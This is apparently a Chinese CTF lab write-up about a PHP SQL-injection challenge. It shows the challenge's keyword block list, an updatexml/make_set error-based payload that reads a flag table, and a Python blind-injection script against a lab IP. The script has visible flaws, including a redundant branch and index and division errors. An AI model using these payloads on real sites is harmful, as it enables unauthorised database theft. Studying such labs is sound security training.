PHP-CTF-Docker /day1

过滤函数：

function stop_hack($value){
    $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
    $back_list = explode("|",$pattern);
    foreach($back_list as $hack){
        if(preg_match("/$hack/i", $value))
            die("$hack detected!");
    }
    return $value;
}

 

?id=1 and 1=1   ?id=1 and 1=2得出数字型sql注入，并且在1后面加上单引号的话就会报错，可以使用报错注入。

 

concat绕过(make_set函数)：

MAKE_SET(bits,str1,str2,…)

返回一个设定值(含子字符串分隔字符串","字符)，在设置位的相应位的字符串。str1对应于位0，str2到第1位，依此类推。在str1，str1有NULL值，…那么不添加到结果。

例子：

 

 

 payload：

?id=1 and updatexml(1,make_set(3,0x7e,(select flag from flag)),1)

 

 

盲注：

 

 盲注脚本：

import requests

url = "http://192.168.6.130/day1/"

def get_length(url):
    for i in range(20):
        payload = url+ "?id=1 and (length(database())>" + str(i) +")"
        r = requests.get(payload)
        if "Lucia" not in r.text:
            print("database length is:%d"%i)
            break


def get_flag(url):
    flag = ''
    for i in range(30):
        left = 32
        right = 127
        while (left < right):
            mid = (left + right)/2
            payload = url + "?id=1 and (ascii(mid((select flag from flag),{},1))>{})".format(i,mid)
            r = requests.get(payload)
            if "Lucia" not in r.text:
                right = mid
            elif "Lucia" in r.text:
                left = mid + 1
            elif "Lucia" not in r.text:
                right = mid
            
        flag += chr(left)
    print(flag)


get_length(url)
get_flag(url)